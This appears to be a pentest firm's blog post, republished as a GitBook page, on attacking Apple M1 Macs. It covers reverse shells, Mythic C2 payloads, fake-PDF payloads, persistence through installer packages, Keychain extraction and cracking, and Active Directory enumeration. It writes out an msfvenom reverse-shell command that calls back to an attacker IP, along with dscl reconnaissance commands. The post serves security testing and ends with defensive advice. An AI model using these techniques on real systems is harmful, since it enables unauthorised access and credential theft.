
<!DOCTYPE HTML>
<html lang="" >
    <head>
        <meta charset="UTF-8">
        <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
        <title>M1 Macs · GitBook</title>
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <meta name="description" content="">
        <meta name="generator" content="GitBook 3.2.3">
        
        
        
    
    <link rel="stylesheet" href="../../gitbook/style.css">

    
            
                
                <link rel="stylesheet" href="../../gitbook/gitbook-plugin-wide-page/wide.css">
                
            
                
                <link rel="stylesheet" href="../../gitbook/gitbook-plugin-highlight/website.css">
                
            
                
                <link rel="stylesheet" href="../../gitbook/gitbook-plugin-search/search.css">
                
            
                
                <link rel="stylesheet" href="../../gitbook/gitbook-plugin-fontsettings/website.css">
                
            
        

    

    
        
    
        
    
        
    
        
    
        
    
        
        <link rel="stylesheet" href="../../styles/website.css">
        
    

        
    
    
    <meta name="HandheldFriendly" content="true"/>
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <link rel="apple-touch-icon-precomposed" sizes="152x152" href="../../gitbook/images/apple-touch-icon-precomposed-152.png">
    <link rel="shortcut icon" href="../../gitbook/images/favicon.ico" type="image/x-icon">

    
    <link rel="next" href="../1_tripping_xss/tripping-over-xss.html" />
    
    
    <link rel="prev" href="../6_noVNC/noVNC.html" />
    

    </head>
    <body>
        
<div class="book">
    <div class="book-summary">
        
            
<div id="book-search-input" role="search">
    <input type="text" placeholder="Type to search" />
</div>

            
                <nav role="navigation">
                


<ul class="summary">
    
    

    

    
        
        
    
        <li class="chapter " data-level="1.1" data-path="../../">
            
                <a href="../../">
            
                    
                    fhlipzero.io
            
                </a>
            

            
        </li>
    

    
        
        <li class="divider"></li>
        
        
    
        <li class="chapter " data-level="2.1" data-path="../6_noVNC/noVNC.html">
            
                <a href="../6_noVNC/noVNC.html">
            
                    
                    Phishy noVNC
            
                </a>
            

            
        </li>
    
        <li class="chapter active" data-level="2.2" data-path="m1_macs.html">
            
                <a href="m1_macs.html">
            
                    
                    M1 Macs
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.3" data-path="../1_tripping_xss/tripping-over-xss.html">
            
                <a href="../1_tripping_xss/tripping-over-xss.html">
            
                    
                    Tripping Over XSS
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.4" data-path="../2_weblogic/weblogic-replication-ftw-kinda.html">
            
                <a href="../2_weblogic/weblogic-replication-ftw-kinda.html">
            
                    
                    Weblogic
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.5" data-path="../3_dante/dante.html">
            
                <a href="../3_dante/dante.html">
            
                    
                    Dante
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.6" data-path="../5_gitbook/gitbook_readme.html">
            
                <a href="../5_gitbook/gitbook_readme.html">
            
                    
                    Gitbook setup
            
                </a>
            

            
        </li>
    

    
        
        <li class="divider"></li>
        
        
    
        <li class="chapter " data-level="3.1" data-path="../../">
            
                <a href="../../">
            
                    
                    Notes
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="3.1.1" data-path="../../notes/windows/windows_readme.html">
            
                <a href="../../notes/windows/windows_readme.html">
            
                    
                    Windows
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="3.1.2" data-path="../../notes/mac/mac_readme.html">
            
                <a href="../../notes/mac/mac_readme.html">
            
                    
                    Macs
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="3.1.3" data-path="../../notes/linux/linux_readme.html">
            
                <a href="../../notes/linux/linux_readme.html">
            
                    
                    Linux
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="3.1.3.1" data-path="../../notes/linux/one-liners.html">
            
                <a href="../../notes/linux/one-liners.html">
            
                    
                    one-liners
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="3.1.3.2" data-path="../../notes/linux/shells.html">
            
                <a href="../../notes/linux/shells.html">
            
                    
                    shells
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="3.1.4" data-path="../../notes/mobile/oneplus_7_root.html">
            
                <a href="../../notes/mobile/oneplus_7_root.html">
            
                    
                    Mobile
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    

    

    <li class="divider"></li>

    <li>
        <a href="https://www.gitbook.com" target="blank" class="gitbook-link">
            Published with GitBook
        </a>
    </li>
</ul>


                </nav>
            
        
    </div>

    <div class="book-body">
        
            <div class="body-inner">
                
                    

<div class="book-header" role="navigation">
    

    <!-- Title -->
    <h1>
        <i class="fa fa-circle-o-notch fa-spin"></i>
        <a href="../.." >M1 Macs</a>
    </h1>
</div>




                    <div class="page-wrapper" tabindex="-1" role="main">
                        <div class="page-inner">
                            
<div id="book-search-results">
    <div class="search-noresults">
    
                                <section class="normal markdown-section">
                                
                                <p>Same posted on my work blog at <a href="https://hub.schellman.com/penetration-testing/analyzing-macos-on-apple-m1-silicon" target="_blank">https://hub.schellman.com/penetration-testing/analyzing-macos-on-apple-m1-silicon</a></p>
<h3 id="intro">Intro</h3>
<p>Mac based corporate environments may be rare but finding a penetration testing team experienced enough to thoroughly test that environment can be even more rare.  It&#x2019;s a niche that is commonly perceived to be more secure than your typical Windows domain out of obscurity and even more so when you throw M1 based Macs into the mix.  I&#x2019;ll be going over some of Schellman&#x2019;s methodology on how we approach an internal engagement knowing that we&#x2019;ll be landing on macOS and some best recommendations to keep that Mac environment secure.</p>
<h3 id="initial-access">Initial Access</h3>
<p>Initial access comes in many forms in macOS, some of which but are not limited to malicious documents, Installer packages, executables, or malicious scripts a user may be tricked into running.  The testing environment I&#x2019;ll be working out of is a standard Kali box acting as the attacker, then a 2021 M1 (not M1 Pro or M1 Max, although these chips would be impacted in the same way) MacBook Pro running macOS Monterey version 12.0.1 in a Virtual Machine without Rosetta 2 installed to demonstrate how this affects initial access and tooling.</p>
<h3 id="fingerprinting-a-m1-mac">Fingerprinting a M1 Mac</h3>
<p>First, a quick word on M1 Macs and how they act out of the box. Below is a screenshot taken from my freshly deployed Virtual Machine showing output of the &#x201C;uname -a&#x201D; command. From this, we verify it&#x2019;s running the arm64 version of macOS, the &#x201C;About this Mac&#x201D; pane, and finally the popup a user receives when trying to run an application not optimized for M1 processors.  Basically, macOS is asking the user to allow Rosetta 2 to be installed, thus allowing x64 / non-M1 optimized applications to run, but how does this affect our payloads if we click Not Now and does this make the endpoint any more secure? </p>
<p><img src="blog_1_about_this_mac.png" alt="about_this_mac" width="600"></p>
<h3 id="simple-shell">Simple Shell</h3>
<p>Let&#x2019;s start nice and simple with a basic reverse shell, this could be hidden inside a malicious application, a script presented to the user as required for a job function in an email, or quickly ran on an unlocked, unmonitored Mac.  This example is executed via Python2 that ships by default on macOS as of writing. Apple has stated that it will be removed in the future (<a href="https://developer.apple.com/documentation/macos-release-notes/macos-catalina-10\_15-release-notes" target="_blank">https://developer.apple.com/documentation/macos-release-notes/macos-catalina-10\_15-release-notes</a>) .  The payload is generated via &#x201C;msfvenom&#x201D; on our attacker box like below and tells the payload to call back to the attacker&#x2019;s IP on port 443:  </p>
<pre><code>msfvenom -p python/shell_reverse_tcp LHOST=10.0.1.189 LPORT=443
</code></pre><p>Once executed on the target Mac via Python in the top Terminal window, we see the shell calling back to the attacker without issue and allows us to execute another uname, whoami, and hostname commands as expected.  But this only gives us basic command execution, so let&#x2019;s crank up the complexity and try out some of the command-and-control (C2) tooling available for macOS engagements.   </p>
<p><img src="blog_2_python_shell_callback.png" alt="python_reverse_shell" width="600">   </p>
<h3 id="binary-payloads">Binary Payloads</h3>
<p>Numerous C2s exist to generate an executable targeting macOS but most also build specifically for x64 processors, not the Apple M1 chip.  The &#x201C;poseidon&#x201D; payload generated out of Mythic gives us our first douse of cold water without Rosetta 2 installed:</p>
<p><img src="blog_3_poseidon.png" alt="poseidon_payload" width="600">     </p>
<p>At least if Rosetta 2 were installed, we could help the payload out by specifying the architecture in Terminal by running &#x201C;arch -x86_64 ./poseidon&#x201D;, but we aren&#x2019;t giving in just yet. Let&#x2019;s try out an &#x201C;apfell&#x201D; payload which runs through osascript instead.  Running the generated apfell.js payload through &#x201C;osascript&#x201D; gets us a successful callback to Mythic and we&#x2019;re able to run a whoami and uname showing we&#x2019;re still running on as arm64 on the M1 Virtual Machine:   </p>
<p><img src="blog_4_apfell_win.png" alt="apfel_payload" width="600">     </p>
<h3 id="malicious-documents">Malicious Documents</h3>
<p>Now that we know apfell payloads have no issue calling back, let&#x2019;s fancy this up a little and wrap it around a better pretext that user is more likely to run.  We can utilize the Mystikal project along with Mythic to generate the following payload that masquerades as a PDF (bottom square) to the user, but really executes the same apfell payload as before giving us a new callback in Mythic (top square) and leaving the user unaware of the active attacker now living on their Mac.   </p>
<p><img src="blog_5_pdf.png" alt="pdf_payload" width="600">     </p>
<h3 id="installer-packages">Installer packages</h3>
<p>Lots of payloads are working great but there are two remaining issues, we have no persistence, meaning we&#x2019;ll lose the connection if the user reboots, and we&#x2019;re only running as the &#x201C;schellman&#x201D; local user.  Both of these issues are solved via the very flexible installer packages commonly utilized for more complex application installations. Using an internally developed process (credit: Nathan Rague) our team is able to generate a package that does all of the following:   </p>
<p>&#x2022;    Establish persistence via a LaunchDaemon as the &#x201C;root&#x201D; user and a LaunchAgent as the current user executed at a defined interval
&#x2022;    Copy any of the created payloads to a local directory to be later called by the above persistence
&#x2022;    Automatically configure new sleep settings, execute the initial payload, or a secondary payload via the installer packages postinstall script to ensure the target mac stays online for testing and a connection is received. </p>
<p>The postinstall script also gives us the unique opportunity to fix the missing Rosetta 2 problem if we like.  Investigation was completed shortly after I worked on my first M1 Mac on exactly how Rosetta 2 is installed and it turns out, it&#x2019;s just an added argument onto the software update program built into macOS and only made available on M1 Macs.  Combine this with knowing postinstall scripts run commands normally reserved for copying files or other installation activities, we can slide in the following line to install Rosetta 2 along with our pentest payload: &#x201C;/usr/sbin/softwareupdate --install-rosetta --agree-to-license&#x201D;.  One last takeaway to be noted on installation packages on M1 Macs in particular, a package that has yet to be optimized will likely fail stating that it&#x2019;s not compatible with this version of macOS.  This ended up being a simple precheck that Installer does when loading up a .pkg file, Installer checks the packages Distribution file for the target architecture which non-optimized macs will list as &#x201C;hostArchitectures=&quot;x86_64&#x201D;, we can solve the install issue by adding &#x201C;arm64&#x201D; to the hostArchitectures section and our install will complete successfully.    </p>
<h3 id="initial-access-gained-now-what">Initial access gained, now what?</h3>
<p> We&#x2019;ve successfully got a call back from a payload in the M1 Mac , now we&#x2019;ll run through some local enumeration, privilege escalation opportunities, and then move into network and lateral movement investigation.</p>
<p>Assuming we&#x2019;re running under the context of a regular user, we&#x2019;ll be looking around the user&#x2019;s home folder first to see what is sitting cleartext.  Apple does protect Downloads, Documents, and Desktop with something called Transparency Consent and Control (TCC) framework which forces you to allow access to a directory via the desired application in System Preferences / Security Privacy / Privacy or hitting allow on the popup like below:</p>
<p><img src="blog_6_tcc.png" alt="tcc" width="600">     </p>
<p>However, anything in your actual /Users/schellman/ folder is readable by any user logged in locally, admin or not, which could be any of the following:<br>&#x2022;    .zsh_history / .bash_history (showing any commands run giving context to how a machine was setup, default deployment activity, passwords that were passed inline to another application, hints toward configuration files which may contain more sensitive information, hints toward other hosts this endpoint has ssh&#x2019;d to in the past)
&#x2022;    .aws, .config, or .azure directories that may contain unsecured credentials
&#x2022;    SSH keys
&#x2022;    Slack cookies (good for social engineering co-workers in to resetting passwords or general information gathering) 
&#x2022;    Library Folder containing Messages from iCloud and then Keychains for local saved passwords
&#x2022;    Browser history</p>
<p>Keychains are our next point of focus, Apple makes it easy to save and sync passwords via your Keychain and multiple devices which much like on Windows, can also be retrieved with the right access.  The actual keychain database is located under each user&apos;s home folder at ~/Library/Keychain/login.keychain-db and can be downloaded for further analysis offline.  We can use the dump-all feature of chainbreaker to get an idea of the content of the Keychain to see if it&#x2019;s in use and worth the time put into cracking the password for it.    </p>
<p><img src="blog_7_keychain.png" alt="keychain" width="300">     </p>
<p>This being my own test keychain, I can verify I have 1 useful password to another test machine saved but the remaining saved passwords are mostly app passwords used by iCloud and other macOS related services.  The cracking time varies depending on complexity but retrieving the Keychain hash then unlocking it can open another valuable pivot point into a cloud only environment.  Here we can see my very secure Keychain password of &#x201C;schellman&#x201D; being cracked via &#x201C;hashcat -m 23100&#x201D; and a short wordlist of company names:   </p>
<p><img src="blog_8_cracked.png" alt="keychain" width="300">     </p>
<p>Then providing the cracked password to chainbreaker again, we can see the saved password:</p>
<p><img src="blog_9_keychain_unlocked.png" alt="keychain_unlocked" width="300">     </p>
<p>Finally, we&#x2019;ll go through some lateral movement and domain reconnaissance we can perform from macOS.  Assuming we&#x2019;re not in a cloud only environment or a user&#x2019;s home network, nmap installs just fine on a Mac to give us a network footprint over an office internet connection or VPN so we can find our next targets that may be hosting vulnerable services.  Also, with .NET 5.0 supporting cross compilation, we can now drop Inveigh to disk and capture SMB NTLM challenge and responses along with various man-in-the-middle and password sniffing attacks.</p>
<p>If we land on a domain joined mac, we can perform much of the same domain enumeration as we can on Windows like below:</p>
<pre><code>List Users: dscl &quot;/Active Directory/CORP/All Domains&quot; ls /Users
List Computers: dscl &quot;/Active Directory/CORP/All Domains&quot; ls /Computers
List Groups: dscl &quot;/Active Directory/CORP/All Domains&quot; ls /Groups
List Domain Info: dsconfigad -show
</code></pre><p>From here, we can then bring in the Bifrost project to interact with AD and list out Kerberos tickets for the current user and list out kerberoastable hashes to be cracked offline later by specifying its &#x201C;-kerberoast true&#x201D; flag.   </p>
<h3 id="recommendations--prevention">Recommendations / Prevention?</h3>
<p>Many of the attacks presented here can be prevented from a user education level covering not installing unsigned packages or accepting unsolicited prompts that want to make changes to their system. We always recommend a strong monitoring platform that alerts on unsigned packages being installed or unsigned executables being allowed to execute by a user and using strong passwords to prevent cracking, these can largely be assigned as requirements via most RMM solutions.   </p>
<h3 id="wrap-up">Wrap Up</h3>
<p>We&#x2019;re just scratching the surface in this article on the myriad of attack paths one can take when working through a macOS penetration test.  Below are just some of the projects we&#x2019;ve talked about here and that our team are fans of.  We&#x2019;re constantly tuning our testing practices and tooling to ensure our team brings the greatest value to all aspects of penetration test, please reach out if there are any questions relating to how our team can help with your next internal engagement.    </p>
<p>Projects cited:<br><a href="https://github.com/its-a-feature/Mythic" target="_blank">https://github.com/its-a-feature/Mythic</a><br><a href="https://github.com/cedowens/SwiftBelt" target="_blank">https://github.com/cedowens/SwiftBelt</a><br><a href="https://github.com/its-a-feature/offensive_macos" target="_blank">https://github.com/its-a-feature/offensive_macos</a><br><a href="https://github.com/its-a-feature/bifrost" target="_blank">https://github.com/its-a-feature/bifrost</a><br><a href="https://github.com/D00MFist/Mystikal" target="_blank">https://github.com/D00MFist/Mystikal</a><br><a href="https://github.com/n0fate/chainbreaker" target="_blank">https://github.com/n0fate/chainbreaker</a><br><a href="https://github.com/Kevin-Robertson/Inveigh" target="_blank">https://github.com/Kevin-Robertson/Inveigh</a><br><a href="https://cedowens.medium.com/initial-access-checks-on-macos-531dd2d0cee6" target="_blank">https://cedowens.medium.com/initial-access-checks-on-macos-531dd2d0cee6</a>   </p>

                                
                                </section>
                            
    </div>
    <div class="search-results">
        <div class="has-results">
            
            <h1 class="search-results-title"><span class='search-results-count'></span> results matching "<span class='search-query'></span>"</h1>
            <ul class="search-results-list"></ul>
            
        </div>
        <div class="no-results">
            
            <h1 class="search-results-title">No results matching "<span class='search-query'></span>"</h1>
            
        </div>
    </div>
</div>

                        </div>
                    </div>
                
            </div>

            
                
                <a href="../6_noVNC/noVNC.html" class="navigation navigation-prev " aria-label="Previous page: Phishy noVNC">
                    <i class="fa fa-angle-left"></i>
                </a>
                
                
                <a href="../1_tripping_xss/tripping-over-xss.html" class="navigation navigation-next " aria-label="Next page: Tripping Over XSS">
                    <i class="fa fa-angle-right"></i>
                </a>
                
            
        
    </div>

    <script>
        var gitbook = gitbook || [];
        gitbook.push(function() {
            gitbook.page.hasChanged({"page":{"title":"M1 Macs","level":"2.2","depth":1,"next":{"title":"Tripping Over XSS","level":"2.3","depth":1,"path":"blogs/1_tripping_xss/tripping-over-xss.md","ref":"blogs/1_tripping_xss/tripping-over-xss.md","articles":[]},"previous":{"title":"Phishy noVNC","level":"2.1","depth":1,"path":"blogs/6_noVNC/noVNC.md","ref":"blogs/6_noVNC/noVNC.md","articles":[]},"dir":"ltr"},"config":{"plugins":["custom-favicon","remove-published-with-link","-sharing","collapsible-menu","wide-page"],"root":"/","styles":{"pdf":"styles/pdf.css","epub":"styles/epub.css","mobi":"styles/mobi.css","ebook":"styles/ebook.css","print":"styles/print.css","website":"styles/website.css"},"pluginsConfig":{"collapsible-menu":{},"search":{},"wide-page":{},"lunr":{"maxIndexSize":1000000,"ignoreSpecialCharacters":false},"fontsettings":{"theme":"white","family":"sans","size":2},"highlight":{},"favicon":"avatar.ico","custom-favicon":{},"remove-published-with-link":{},"theme-default":{"styles":{"pdf":"styles/pdf.css","epub":"styles/epub.css","mobi":"styles/mobi.css","ebook":"styles/ebook.css","print":"styles/print.css","website":"styles/website.css"},"showLevel":false}},"theme":"default","pdf":{"pageNumbers":true,"fontSize":12,"fontFamily":"Arial","paperSize":"a4","chapterMark":"pagebreak","pageBreaksBefore":"/","margin":{"right":62,"left":62,"top":56,"bottom":56}},"fontsettings":{"theme":"night"},"structure":{"langs":"LANGS.md","readme":"README.md","glossary":"GLOSSARY.md","summary":"SUMMARY.md"},"variables":{},"gitbook":"*"},"file":{"path":"blogs/4_m1_macs/m1_macs.md","mtime":"2022-02-21T14:08:11.000Z","type":"markdown"},"gitbook":{"version":"3.2.3","time":"2025-03-19T11:57:59.624Z"},"basePath":"../..","book":{"language":""}});
        });
    </script>
</div>

        
    <script src="../../gitbook/gitbook.js"></script>
    <script src="../../gitbook/theme.js"></script>
    
        
        <script src="../../gitbook/gitbook-plugin-remove-published-with-link/remove-link.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-collapsible-menu/plugin.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-search/search-engine.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-search/search.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-lunr/lunr.min.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-lunr/search-lunr.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-fontsettings/fontsettings.js"></script>
        
    

    </body>
</html>

